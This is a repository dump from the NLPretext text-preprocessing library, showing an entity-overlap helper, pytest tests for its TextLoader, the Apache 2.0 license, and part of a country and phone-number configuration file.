251 | return entities_to_clean
252 |
253 |
254 | def check_interval_included(
255 | element1: Dict[str, Any], element2: Dict[str, Any]
256 | ) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:
257 | """
258 |     Compare two entities on start and end positions to find if they are nested or overlapping.
259 |
260 | Parameters
261 | ----------
262 | element1 : dict
263 | element2 : dict
264 | both of them in the following format
265 | {
266 | 'entity': str,
267 | 'word': str,
268 | 'startCharIndex': int,
269 | 'endCharIndex': int
270 | }
271 |
272 | Returns
273 | -------
274 |     If one of the two entities should be removed, returns a tuple
275 |     (element to remove, element to keep).
276 |     If not, returns None.
277 | """
278 | if (
279 | (element1 != element2)
280 | and (element1["startCharIndex"] >= element2["startCharIndex"])
281 | and (element1["endCharIndex"] <= element2["endCharIndex"])
282 | ):
283 | return element1, element2
284 | if (
285 | (element1 != element2)
286 | and (element2["startCharIndex"] >= element1["startCharIndex"])
287 | and (element2["endCharIndex"] <= element1["endCharIndex"])
288 | ):
289 | return element2, element1
290 | if (
291 | (element1 != element2)
292 | and (element1["startCharIndex"] >= element2["startCharIndex"])
293 | and (element1["endCharIndex"] >= element2["endCharIndex"])
294 | and (element1["startCharIndex"] <= element2["endCharIndex"] - 1)
295 | ):
296 | return element1, element2
297 | if (
298 | (element1 != element2)
299 | and (element2["startCharIndex"] >= element1["startCharIndex"])
300 | and (element2["endCharIndex"] >= element1["endCharIndex"])
301 |         and (element2["startCharIndex"] <= element1["endCharIndex"] - 1)
302 | ):
303 | return element2, element1
304 | return None
305 |
--------------------------------------------------------------------------------
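An illustrative call to augment_text above; the sentence, the entity, and its
character indices are made up, and the wordnet_synonym method assumes the NLTK
WordNet data is available locally:

    from nlpretext.augmentation.text_augmentation import augment_text

    # "Paris" spans characters 10-15 of the sentence below.
    entities = [{"entity": "LOC", "word": "Paris", "startCharIndex": 10, "endCharIndex": 15}]
    augmented, new_entities = augment_text(
        "I live in Paris with my family.",
        method="wordnet_synonym",   # or "aug_sub_bert" for BERT-based substitution
        stopwords=["family"],       # words to freeze during augmentation
        entities=entities,
    )

--------------------------------------------------------------------------------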
/tests/test_textloader.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | # mypy: disable-error-code="attr-defined"
19 |
20 | from pathlib import Path
21 | from unittest.mock import MagicMock, patch
22 |
23 | try:
24 | import dask.bag as db
25 | import dask.dataframe as dd
26 | except ImportError as e:
27 | raise ImportError("please install dask: pip install dask[complete]") from e
28 |
29 | try:
30 | import pandas as pd
31 | except ImportError as e:
32 | raise ImportError("please install pandas: pip install pandas") from e
33 |
34 | import pytest
35 | from nlpretext.preprocessor import Preprocessor
36 | from nlpretext.textloader import TextLoader
37 | from pandas.testing import assert_frame_equal
38 |
39 | # pylint: disable=protected-access
40 |
41 |
42 | @patch("dask.bag.read_text")
43 | def test__read_text_txt_dask(mock_read_text):
44 | # Given
45 | files_path = "some_path/to_read.txt"
46 | file_format = "txt"
47 | encoding = "utf-8"
48 | text_column = "text"
49 | mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"])
50 |
51 | expected_result = dd.from_pandas(
52 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
53 | npartitions=2,
54 | )
55 |
56 | # When
57 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
58 | actual_result = dummy_instance._read_text_txt(files_path)
59 |
60 | # Then
61 | mock_read_text.assert_called_once_with(files_path, encoding=encoding)
62 | assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))
63 |
64 |
65 | @patch("pandas.read_fwf")
66 | def test__read_text_txt_pandas(mock_read_text):
67 | # Given
68 | files_path = "some_path/to_read.txt"
69 | file_format = "txt"
70 | encoding = "utf-8"
71 | text_column = "text"
72 | mock_read_text.return_value = pd.DataFrame(
73 | {text_column: ["This is a text", "This is another text"]}
74 | )
75 |
76 | expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]})
77 |
78 | # When
79 | dummy_instance = TextLoader(
80 | file_format=file_format,
81 | use_dask=False,
82 | encoding=encoding,
83 | text_column=text_column,
84 | )
85 | actual_result = dummy_instance._read_text_txt(files_path)
86 |
87 | # Then
88 | mock_read_text.assert_called_once_with(
89 | str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]
90 | )
91 | assert_frame_equal(expected_result, actual_result.reset_index(drop=True))
92 |
93 |
94 | @patch("nlpretext._utils.daskloader.dd")
95 | def test__read_text_json_dask(mock_read):
96 | # Given
97 | files_path = "some_path/to_read.json"
98 | file_format = "json"
99 | encoding = "utf-8"
100 | text_column = "text"
101 |
102 | text_ddf = dd.from_pandas(
103 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
104 | npartitions=2,
105 | )
106 | mock_read.read_json.return_value = text_ddf
107 |
108 | expected_result = text_ddf[[text_column]]
109 |
110 | # When
111 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
112 | actual_result = dummy_instance._read_text_json(files_path)
113 |
114 | # Then
115 | mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)
116 | assert_frame_equal(expected_result.compute(), actual_result.compute())
117 |
118 |
119 | @patch("nlpretext._utils.pandasloader.read_json")
120 | def test__read_text_json_pandas(mock_read):
121 | # Given
122 |     files_path = "some_path/to_read.json"
123 |     file_format = "json"
124 | encoding = "utf-8"
125 | text_column = "text"
126 |
127 | dummy_instance = TextLoader(
128 | file_format=file_format,
129 | use_dask=False,
130 | encoding=encoding,
131 | text_column=text_column,
132 | )
133 | dummy_instance._read_text_json(files_path)
134 |
135 | # Then
136 | mock_read.assert_called_once_with(files_path, encoding=encoding)
137 |
138 |
139 | @patch("dask.dataframe.read_csv")
140 | def test__read_text_csv_dask(mock_read_csv):
141 | # Given
142 | files_path = "some_path/to_read.csv"
143 | file_format = "csv"
144 | encoding = "utf-8"
145 | text_column = "text"
146 |
147 | text_ddf = dd.from_pandas(
148 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
149 | npartitions=2,
150 | )
151 | mock_read_csv.return_value = text_ddf
152 |
153 | expected_result = text_ddf[[text_column]]
154 |
155 | # When
156 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
157 | actual_result = dummy_instance._read_text_csv(files_path)
158 |
159 | # Then
160 | mock_read_csv.assert_called_once_with(files_path, encoding=encoding)
161 | assert_frame_equal(expected_result.compute(), actual_result.compute())
162 |
163 |
164 | @patch("nlpretext._utils.pandasloader.read_csv")
165 | def test__read_text_csv_pandas(mock_read):
166 | # Given
167 |     files_path = "some_path/to_read.csv"
168 |     file_format = "csv"
169 | encoding = "utf-8"
170 | text_column = "text"
171 |
172 | dummy_instance = TextLoader(
173 | file_format=file_format,
174 | use_dask=False,
175 | encoding=encoding,
176 | text_column=text_column,
177 | )
178 | dummy_instance._read_text_csv(files_path)
179 |
180 | # Then
181 | mock_read.assert_called_once_with(files_path, encoding=encoding)
182 |
183 |
184 | @patch("dask.dataframe.read_parquet")
185 | def test__read_text_parquet_dask(mock_read_parquet):
186 | # Given
187 | files_path = "some_path/to_read.parquet"
188 | file_format = "parquet"
189 | encoding = "utf-8"
190 | text_column = "text"
191 |
192 | text_ddf = dd.from_pandas(
193 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
194 | npartitions=2,
195 | )
196 | mock_read_parquet.return_value = text_ddf
197 |
198 | expected_result = text_ddf[[text_column]]
199 |
200 | # When
201 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
202 | actual_result = dummy_instance._read_text_parquet(files_path)
203 |
204 | # Then
205 | mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)
206 | assert_frame_equal(expected_result.compute(), actual_result.compute())
207 |
208 |
209 | @patch("nlpretext._utils.pandasloader.read_parquet")
210 | def test__read_text_parquet_pandas(mock_read):
211 | # Given
212 |     files_path = "some_path/to_read.parquet"
213 |     file_format = "parquet"
214 | encoding = "utf-8"
215 | text_column = "text"
216 |
217 | dummy_instance = TextLoader(
218 | file_format=file_format,
219 | use_dask=False,
220 | encoding=encoding,
221 | text_column=text_column,
222 | )
223 | dummy_instance._read_text_parquet(files_path)
224 |
225 | # Then
226 | mock_read.assert_called_once_with(files_path, encoding=encoding)
227 |
228 |
229 | @pytest.mark.parametrize(
230 | "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised",
231 | [
232 | ("text_file1.json", None, None, True, None, "json", None),
233 | ("text_file2.json", "json", None, True, None, "json", None),
234 | ("text_file3.csv", None, "utf-8", True, None, "csv", None),
235 | ("text_file4.csv", None, None, False, None, "csv", None),
236 | ("text_file3.parquet", None, "utf-8", True, None, "parquet", None),
237 | ("text_file4.parquet", None, None, False, None, "parquet", None),
238 | ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"),
239 | ("text_file6.txt", None, None, False, Preprocessor(), "txt", None),
240 | (
241 | "text_file8.txt",
242 | None,
243 | None,
244 | False,
245 | MagicMock(),
246 | "txt",
247 | "Only NLPretext preprocessors can be specified",
248 | ),
249 | ],
250 | )
251 | @patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True)
252 | @patch("nlpretext.textloader.TextLoader._read_text_json")
253 | @patch("nlpretext.textloader.TextLoader._read_text_txt")
254 | @patch("nlpretext.textloader.TextLoader._read_text_csv")
255 | @patch("nlpretext.textloader.TextLoader._read_text_parquet")
256 | @patch("nlpretext.textloader.check_text_file_format")
257 | def test_read_text(
258 | mock_check_text_file_format,
259 | mock__read_text_parquet,
260 | mock__read_text_csv,
261 | mock__read_text_txt,
262 | mock__read_text_json,
263 | mock_run,
264 | files_path,
265 | file_format,
266 | encoding,
267 | compute_to_pandas,
268 | preprocessor,
269 | expected_format,
270 | raised,
271 | ):
272 | # Given
273 | text_column = "text"
274 | if encoding is None:
275 | encoding = "utf-8"
276 |
277 | if file_format is None:
278 | mock_check_text_file_format.return_value = expected_format
279 |
280 | mock_reader_mapping = {
281 | "csv": mock__read_text_csv,
282 | "txt": mock__read_text_txt,
283 | "json": mock__read_text_json,
284 | "parquet": mock__read_text_parquet,
285 | }
286 |
287 | expected_result = dd.from_pandas(
288 | pd.DataFrame({text_column: ["Text with #", "Text with double space"]}),
289 | npartitions=2,
290 | )
291 | mock_reader_mapping.get(expected_format).return_value = expected_result # type: ignore
292 |
293 | # When
294 | dummy_textloader = TextLoader(
295 | text_column=text_column, encoding=encoding, file_format=file_format
296 | )
297 |
298 | if raised is None:
299 | actual_result = dummy_textloader.read_text(
300 | files_path, file_format, encoding, compute_to_pandas, preprocessor
301 | )
302 |
303 | # Then
304 | if file_format is None:
305 | mock_check_text_file_format.assert_called_once_with(files_path)
306 |
307 | mock_reader_mapping[expected_format].assert_called_once_with(files_path)
308 |
309 | if preprocessor is not None:
310 | if isinstance(preprocessor, Preprocessor):
311 | mock_run.assert_called()
312 | preprocessed_texts = ["Text with", "Text with double space"]
313 | mock_run.side_effect = preprocessed_texts
314 | expected_result = dd.from_pandas(
315 | pd.DataFrame({text_column: preprocessed_texts}), npartitions=2
316 | )
317 |
318 | if not compute_to_pandas:
319 | actual_result = actual_result.compute()
320 | assert_frame_equal(expected_result.compute(), actual_result)
321 |
322 | else:
323 | with pytest.raises(ValueError, match=raised):
324 | dummy_textloader.read_text(
325 | files_path, file_format, encoding, compute_to_pandas, preprocessor
326 | )
327 |
--------------------------------------------------------------------------------
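The pandas-side tests above all follow the same pattern: patch the relevant
reader in nlpretext._utils.pandasloader, call the private reader directly, and
assert the delegation. A condensed sketch of that pattern (the path is a
placeholder):

    from unittest.mock import patch

    from nlpretext.textloader import TextLoader

    with patch("nlpretext._utils.pandasloader.read_csv") as mock_read:
        TextLoader(use_dask=False)._read_text_csv("some_path/to_read.csv")
        mock_read.assert_called_once_with("some_path/to_read.csv", encoding="utf-8")

--------------------------------------------------------------------------------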
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
--------------------------------------------------------------------------------
/nlpretext/_config/config.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
19 | from typing import List, Optional
20 |
21 | import os
22 |
23 | import phonenumbers as _phonenumbers
24 |
25 | ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
26 |
27 | # Country config
28 | COUNTRY_MAPPING_ISO = {
29 | "af": "Afghanistan",
30 | "ax": "Åland Islands",
31 | "al": "Albania",
32 | "dz": "Algeria",
33 | "as": "American Samoa",
34 | "ad": "Andorra",
35 | "ao": "Angola",
36 | "ai": "Anguilla",
37 | "aq": "Antarctica",
38 | "ag": "Antigua and Barbuda",
39 | "ar": "Argentina",
40 | "am": "Armenia",
41 | "aw": "Aruba",
42 | "au": "Australia",
43 | "at": "Austria",
44 | "az": "Azerbaijan",
45 | "bs": "Bahamas",
46 | "bh": "Bahrain",
47 | "bd": "Bangladesh",
48 | "bb": "Barbados",
49 | "by": "Belarus",
50 | "be": "Belgium",
51 | "bz": "Belize",
52 | "bj": "Benin",
53 | "bm": "Bermuda",
54 | "bt": "Bhutan",
55 | "bo": "Bolivia (Plurinational State of)",
56 | "bq": "Bonaire, Sint Eustatius and Saba",
57 | "ba": "Bosnia and Herzegovina",
58 | "bw": "Botswana",
59 | "bv": "Bouvet Island",
60 | "br": "Brazil",
61 | "io": "British Indian Ocean Territory",
62 | "bn": "Brunei Darussalam",
63 | "bg": "Bulgaria",
64 | "bf": "Burkina Faso",
65 | "bi": "Burundi",
66 | "cv": "Cabo Verde",
67 | "kh": "Cambodia",
68 | "cm": "Cameroon",
69 | "ca": "Canada",
70 | "ky": "Cayman Islands",
71 | "cf": "Central African Republic",
72 | "td": "Chad",
73 | "cl": "Chile",
74 | "cn": "China",
75 | "cx": "Christmas Island",
76 | "cc": "Cocos (Keeling) Islands",
77 | "co": "Colombia",
78 | "km": "Comoros",
79 | "cg": "Congo",
80 | "cd": "Congo, Democratic Republic of the",
81 | "ck": "Cook Islands",
82 | "cr": "Costa Rica",
83 | "ci": "Côte d'Ivoire",
84 | "hr": "Croatia",
85 | "cu": "Cuba",
86 | "cw": "Curaçao",
87 | "cy": "Cyprus",
88 | "cz": "Czechia",
89 | "dk": "Denmark",
90 | "dj": "Djibouti",
91 | "dm": "Dominica",
92 | "do": "Dominican Republic",
93 | "ec": "Ecuador",
94 | "eg": "Egypt",
95 | "sv": "El Salvador",
96 | "gq": "Equatorial Guinea",
97 | "er": "Eritrea",
98 | "ee": "Estonia",
99 | "sz": "Eswatini",
100 | "et": "Ethiopia",
101 | "fk": "Falkland Islands (Malvinas)",
102 | "fo": "Faroe Islands",
103 | "fj": "Fiji",
104 | "fi": "Finland",
105 | "fr": "France",
106 | "gf": "French Guiana",
107 | "pf": "French Polynesia",
108 | "tf": "French Southern Territories",
109 | "ga": "Gabon",
110 | "gm": "Gambia",
111 | "ge": "Georgia",
112 | "de": "Germany",
113 | "gh": "Ghana",
114 | "gi": "Gibraltar",
115 | "gr": "Greece",
116 | "gl": "Greenland",
117 | "gd": "Grenada",
118 | "gp": "Guadeloupe",
119 | "gu": "Guam",
120 | "gt": "Guatemala",
121 | "gg": "Guernsey",
122 | "gn": "Guinea",
123 | "gw": "Guinea-Bissau",
124 | "gy": "Guyana",
125 | "ht": "Haiti",
126 | "hm": "Heard Island and McDonald Islands",
127 | "va": "Holy See",
128 | "hn": "Honduras",
129 | "hk": "Hong Kong",
130 | "hu": "Hungary",
131 | "is": "Iceland",
132 | "in": "India",
133 | "id": "Indonesia",
134 | "ir": "Iran (Islamic Republic of)",
135 | "iq": "Iraq",
136 | "ie": "Ireland",
137 | "im": "Isle of Man",
138 | "il": "Israel",
139 | "it": "Italy",
140 | "jm": "Jamaica",
141 | "jp": "Japan",
142 | "je": "Jersey",
143 | "jo": "Jordan",
144 | "kz": "Kazakhstan",
145 | "ke": "Kenya",
146 | "ki": "Kiribati",
147 | "kp": "Korea (Democratic People's Republic of)",
148 | "kr": "Korea, Republic of",
149 | "kw": "Kuwait",
150 | "kg": "Kyrgyzstan",
151 | "la": "Lao People's Democratic Republic",
152 | "lv": "Latvia",
153 | "lb": "Lebanon",
154 | "ls": "Lesotho",
155 | "lr": "Liberia",
156 | "ly": "Libya",
157 | "li": "Liechtenstein",
158 | "lt": "Lithuania",
159 | "lu": "Luxembourg",
160 | "mo": "Macao",
161 | "mg": "Madagascar",
162 | "mw": "Malawi",
163 | "my": "Malaysia",
164 | "mv": "Maldives",
165 | "ml": "Mali",
166 | "mt": "Malta",
167 | "mh": "Marshall Islands",
168 | "mq": "Martinique",
169 | "mr": "Mauritania",
170 | "mu": "Mauritius",
171 | "yt": "Mayotte",
172 | "mx": "Mexico",
173 | "fm": "Micronesia (Federated States of)",
174 | "md": "Moldova, Republic of",
175 | "mc": "Monaco",
176 | "mn": "Mongolia",
177 | "me": "Montenegro",
178 | "ms": "Montserrat",
179 | "ma": "Morocco",
180 | "mz": "Mozambique",
181 | "mm": "Myanmar",
182 | "na": "Namibia",
183 | "nr": "Nauru",
184 | "np": "Nepal",
185 | "nl": "Netherlands",
186 | "nc": "New Caledonia",
187 | "nz": "New Zealand",
188 | "ni": "Nicaragua",
189 | "ne": "Niger",
190 | "ng": "Nigeria",
191 | "nu": "Niue",
192 | "nf": "Norfolk Island",
193 | "mk": "North Macedonia",
194 | "mp": "Northern Mariana Islands",
195 | "no": "Norway",
196 | "om": "Oman",
197 | "pk": "Pakistan",
198 | "pw": "Palau",
199 | "ps": "Palestine, State of",
200 | "pa": "Panama",
201 | "pg": "Papua New Guinea",
202 | "py": "Paraguay",
203 | "pe": "Peru",
204 | "ph": "Philippines",
205 | "pn": "Pitcairn",
206 | "pl": "Poland",
207 | "pt": "Portugal",
208 | "pr": "Puerto Rico",
209 | "qa": "Qatar",
210 | "re": "Réunion",
211 | "ro": "Romania",
212 | "ru": "Russian Federation",
213 | "rw": "Rwanda",
214 | "bl": "Saint Barthélemy",
215 | "sh": "Saint Helena, Ascension and Tristan da Cunha",
216 | "kn": "Saint Kitts and Nevis",
217 | "lc": "Saint Lucia",
218 | "mf": "Saint Martin (French part)",
219 | "pm": "Saint Pierre and Miquelon",
220 | "vc": "Saint Vincent and the Grenadines",
221 | "ws": "Samoa",
222 | "sm": "San Marino",
223 | "st": "Sao Tome and Principe",
224 | "sa": "Saudi Arabia",
225 | "sn": "Senegal",
226 | "rs": "Serbia",
227 | "sc": "Seychelles",
228 | "sl": "Sierra Leone",
229 | "sg": "Singapore",
230 | "sx": "Sint Maarten (Dutch part)",
231 | "sk": "Slovakia",
232 | "si": "Slovenia",
233 | "sb": "Solomon Islands",
234 | "so": "Somalia",
235 | "za": "South Africa",
236 | "gs": "South Georgia and the South Sandwich Islands",
237 | "ss": "South Sudan",
238 | "es": "Spain",
239 | "lk": "Sri Lanka",
240 | "sd": "Sudan",
241 | "sr": "Suriname",
242 | "sj": "Svalbard and Jan Mayen",
243 | "se": "Sweden",
244 | "ch": "Switzerland",
245 | "sy": "Syrian Arab Republic",
246 | "tw": "Taiwan, Province of China",
247 | "tj": "Tajikistan",
248 | "tz": "Tanzania, United Republic of",
249 | "th": "Thailand",
250 | "tl": "Timor-Leste",
251 | "tg": "Togo",
252 | "tk": "Tokelau",
253 | "to": "Tonga",
254 | "tt": "Trinidad and Tobago",
255 | "tn": "Tunisia",
256 | "tr": "Turkey",
257 | "tm": "Turkmenistan",
258 | "tc": "Turks and Caicos Islands",
259 | "tv": "Tuvalu",
260 | "ug": "Uganda",
261 | "ua": "Ukraine",
262 | "ae": "United Arab Emirates",
263 | "gb": "United Kingdom of Great Britain and Northern Ireland",
264 | "us": "United States of America",
265 | "um": "United States Minor Outlying Islands",
266 | "uy": "Uruguay",
267 | "uz": "Uzbekistan",
268 | "vu": "Vanuatu",
269 | "ve": "Venezuela (Bolivarian Republic of)",
270 | "vn": "Viet Nam",
271 | "vg": "Virgin Islands (British)",
272 | "vi": "Virgin Islands (U.S.)",
273 | "wf": "Wallis and Futuna",
274 | "eh": "Western Sahara",
275 | "ye": "Yemen",
276 | "zm": "Zambia",
277 | "zw": "Zimbabwe",
278 | }
279 |
280 | # Phone numbers config
281 | SUPPORTED_COUNTRY: List[Optional[str]] = [
282 | None,
283 | "US",
284 | "AG",
285 | "AI",
286 | "AS",
287 | "BB",
288 | "BM",
289 | "BS",
290 | "CA",
291 | "DM",
292 | "GD",
293 | "GU",
294 | "JM",
295 | "KN",
296 | "KY",
297 | "LC",
298 | "MP",
299 | "MS",
300 | "PR",
